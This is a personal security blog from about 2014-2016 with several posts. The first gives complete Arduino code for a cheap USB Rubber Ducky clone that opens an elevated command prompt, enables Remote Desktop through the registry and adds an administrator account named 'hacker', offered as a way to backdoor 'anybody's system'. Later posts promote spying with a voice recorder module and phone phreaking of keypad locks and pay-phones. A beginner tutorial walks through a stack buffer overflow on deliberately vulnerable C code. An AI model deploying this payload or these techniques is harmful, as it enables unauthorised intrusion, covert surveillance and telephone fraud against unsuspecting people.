Presenting at NCSSS-15 Cyber Summit

Awarded with the prestigious Award of Excellence by National Cyber Defense and Research Center

Presenting at Defcon | OWASP Lucknow Chapter at Amity, Lucknow

Demonstrating the Usage of Advanced Hadware Devices and Facial Recognition

In an Exclusive Conversation with India Watch

Interview for India Watch Channel on Security in India. Click to Know More...

Saturday, 24 September 2016

Recreating a USB Rubber Ducky under $4 in India

Holla Guys,

It's been a while I have been on my very own domain :P Anyways, today I would like to show you guys few things I have done in the past few years. I have been playing around with a lot of Arduino chips and ended up creating a clone of the USB Rubber Ducky using the keyboard libraries.

By using cheap Arduino chips I was not only able to run commands on my computer system but was able to bypass Android 4-Digit lock in less than 2 hours. So how was i able to do it? The very first thing we require is an Arduino Pro Micro Chip. You will find it on Amazon, Ebay or anywhere else and it would cost around 800-900 Rupees which is a lot of money :P So, I chose to go with Aliexpress and got the chips for less than $4. Check the screen below for pricing:
Pro Micro Arduino Chip

Having the chip, all you need to is to use a USB - Micro Cable to connect your new Arduino chip to the system. For all the folks who know about Arduino's please feel free to skip one or two paragraphs. You will need the Arduino IDE (Download and install). You will also need to set your board to Arduino Leonardo(Compatible with Arduino Pro Micro)

Next, all we need to do is to interpret our required functionality in the form of keystrokes and build a program around it. Keyboard.press() function will type the required key for us while Keyboard.release() will release a particular key. Another important function is Keyboard.releaseAll() which will release all the pressed keys at once. Say, "CTRL+SHIFT+DEL" pressing this combination will require you to press one key after the other while holding them all and releasing them together. Similar combinations are required for any combinations we want. The beauty of the Arduino is that it types in so fast that barely a human eye could catch(if very little delays are present).  Let's say we need to open an admin prompt; we will first press the left windows key, then we will type in cmd, then right clicking cmd(CTRL+SHIFT+F10), then a down arrow key and finally enter key. However, if UAC is enabled another Right Arrow Press Followed by an Enter is required. You can understand the functionality through the following image:

So, let's simply create an example program which will Bypass UAC, Enable RDP and add a user named hacker to the system as follows:
void setup() {
    Keyboard.begin();
delay(3000);   
type(KEY_LEFT_GUI,false);
Keyboard.releaseAll();
delay(100);
print(F("cmd.exe"));
delay(1000);
type(KEY_LEFT_CTRL,false);
type(KEY_LEFT_SHIFT,false);
type(KEY_F10,false);
Keyboard.releaseAll();
delay(200);
type(KEY_DOWN_ARROW,false);
Keyboard.releaseAll();
delay(200);
type(KEY_DOWN_ARROW,false);
Keyboard.releaseAll();
delay(200);
type(KEY_DOWN_ARROW,false);
Keyboard.releaseAll();
delay(500); 
type(KEY_RETURN,false);
Keyboard.releaseAll();
delay(2000);
type(KEY_LEFT_ARROW,false);
Keyboard.releaseAll();
delay(100);
type(KEY_RETURN,false);
Keyboard.releaseAll();
delay(1000);
print(F("reg add "));
delay(1000);
String abc= "\\";
print(F("\"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\""));
delay(1000);
print(F(" /v fDenyTSConnections /t REG_DWORD /d 0 /f"));
delay(2000);
type(KEY_RETURN,false);
Keyboard.releaseAll();
print(F("net user hacker hacker /add"));
delay(1000);
type(KEY_RETURN,false);
Keyboard.releaseAll();
delay(5000);
print(F("net localgroup administrators hacker /add"));
delay(1000);
type(KEY_RETURN,false);
Keyboard.releaseAll();
delay(5000);
print(F("exit"));
delay(1000);
type(KEY_RETURN,false);
Keyboard.releaseAll();
Keyboard.end();
}
void type(int key, boolean release) {
    Keyboard.press(key);
    if(release)
        Keyboard.release(key);
}
void print(const __FlashStringHelper *value) {
    Keyboard.print(value);
}
void loop(){}
Loading this program into the Arduino, we can backdoor anybody's system with a new user account and can remote connect to the system. However, using a little modification you can also obtain the IP address of the system as well. I have already created a demonstration exploiting the CTRL+SHIFT+PRNTSCR functionality at login time which can be found below:

Enjoy!!
 

Wednesday, 3 December 2014

Keep Spying with a Low Cost Voice Recorder

Voice Recording is one of the primary aspects when it comes to Spying. Today let us discuss about ISD 1820 Voice Recording Module.

This Module works both independently as well as with Arduino, Pi Boards etc. it is quite small, say a few centimeters bigger than the SD card adapter. This module operates on 3V-5V. Starting to record, playing back can both be controlled using hardware switches as well as Boards like Arduino, Pi etc.

This module is can be used to build various projects for spying and can be interfaced with SIM900, Motion Sensor so on and so forth.

A Basic Video demonstrating operations of this module can be found at-

Wednesday, 19 November 2014

Android Keypad Tones, A Perfect BlueBox!

Hi,
I recently found that keypad tones from android devices can act as a perfect phone phreaking blue box.

In Simple Terms: Feed in Equivalent Calling tones to the Mic of the Land Line from Android, this will allow you to call the number for whom the tones are generated for. 

However, for some devices like Samsung and others, may not generate the same tones. However, for those devices, we can simply install ToneDef Application from Google Playstore for free. Using this app or the android dialer pad itself may allow phreaking on telephone land lines.

So many of you guys might have seen a old style phone lock that hides the entire keypad from a landline phone. Now, you don't have to bother about that at all. We can simply use an android app to bypass Keypad locks and in most cases with the ToneDef app we can simply bypass Pay-Phones as well.

Have a Look at a simple demonstration using android at-
Kindly share your thoughts in the comments and if you liked the video, kindly give it a share.

Monday, 27 October 2014

Exploit Writing Series Tutorial 1: Buffer Overflow on Linux

Hey folks,
i have been thinking for so long to start a noob friendly series on exploit writing but never got that much time. Anyways, let's talk about exploit writing-

So, what is an exploit?
an exploit is a piece of code that takes the advantage of a vulnerable system.

However, keeping this a noob friendly tutorial let's make some things very clear. Firstly, an exploit may or may not work on two different application versions, may not work on two different operating systems.
Secondly, if you think you already know basics, you can leave the website immediately.

Well, Throughout this series we will start from the very basic (I Mean it :P) this means we will take up things as soon as they appear. So, you don't have to worry about ASM, Comp. Architecture etc.

Pre-requisites
i already mentioned that we will take up things as soon as they appear. However, for this tutorial you should have a lil knowledge about C Programming.

So, let's take up the most basic "Stack based Buffer Overflows" at the very first stage-

Now, what is a stack?
we can see in the above picture that we organized every book one above the other. However, we can collectively say that this is a stack of books. Now, to build this stack, we placed the first book, then the other on top of it and so on until we run out of books.

Exactly, what follows in Computer systems. We can put operands and operators one above the other to form a stack. This is called the "Push" operation. This also means that the first book is now at the bottom and the last one is at the top. This is why stack is called Last-in-First-Out. So, when we need to remove a book, we first need to remove the book at the top, this is called the "Pop" operation.

So, What is Buffer Overflow?
A buffer is a region which stores data temporarily and when more data than its capacity is supplied, it gets overflowed.

Let's see an example-
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
void noexec()
{
printf("this never executes");
exit(0);
}

void main(int argc, char** argv)
{
char buffer[50];
strcpy(buffer,argv[1]);
printf(buffer);
}
In the above program, we have two different functions- main and noexec. When we run this program, it simply receives the command line argument, copies it into the buffer variable and simply prints it. Now, you might ask, why do we have noexec() function if we are not calling it any where in the program? this is because in order to work out the simplest buffer overflow, we will try to execute this function by exploiting it.

Let's compile this program using the following command-
#gcc -ggdb -o rofl -fno-stack-protector expl1.c -mpreferred-stack-boundary=2
To compile a C program in linux, we use gcc, -ggdb option allows the code to be executed and listed in debugger by supplying enough information to the debugger, about the program, -fno-stack-protector option turns off stack protection mechanisms in Linux while compiling the program and -mpreferred-stack-boundary=2 option aligns the stack on a 4-byte boundary and will be susceptible to crash as well. However, by default it's on 16-byte boundary.

(You can Skip the above paragraph, for now we just need to focus on compiling the application program)

Let's execute the program, and supply 50 A's, we can see that it gets printed, Let's try with 51 A's, 52 A's and 53 A's. We can see that program exited normally after outputting the supplied input. However, as soon as we provide 54 A's we get Segmentation Fault which denotes crashing of the program or we can say the buffer just overflowed. You might ask, we had the buffer for 50 characters but it still got executed at 51,52,53. This is because the input didn't overwrote the EIP initially and may have overwrote other registers which didn't affected the program's execution.

What is EIP?
A register which stores the address of the next instruction. Therefore, if we overwrite this EIP register with the address of our choice, our choice will be the next instruction to be executed by the program. This potentially means that we can redirect the flow of a program to anywhere we want.

Let's open this program in GDB-
GDB is a debugger which can allow us to view the state of the registers, stack, memory locations etc throughout the execution of a program(I Know this is the most basic tutorial and introducing GDB may not be the correct idea right now, but for the sake of running the noexec function we need its memory address).

#gdb ./rofl

the above command will run the program in GDB. To find the starting address of the noexec() function we need to input a simple command which is "disassemble" followed by the name of the function


(gdb) disas noexec

this command will output the following-
Don't get scared! for Now, we only need the address of the first instruction which is 0x0804847c.

Next, we simply need to input this address after 54 A characters and this will overwrite the current address in EIP resulting in altering the flow of the program according to our needs.

Let's test it out-
Keeping it simple, we will supply 54 A's and the address in Little endian format which is to reverse the bytes(ex- split the bytes 08 04 84 7c to 7c 84 04 08.
We can see that after outputting the input, noexec function runs thus outputting "This Function Does Not Execute".

This tutorial is purely for the newbies in exploit writing. If You liked this tutorial, comment your feedback and suggestions.

For exploiting the same on x64 based architecture, refer to Adhokshaj Mishra's Website.

See you Next week.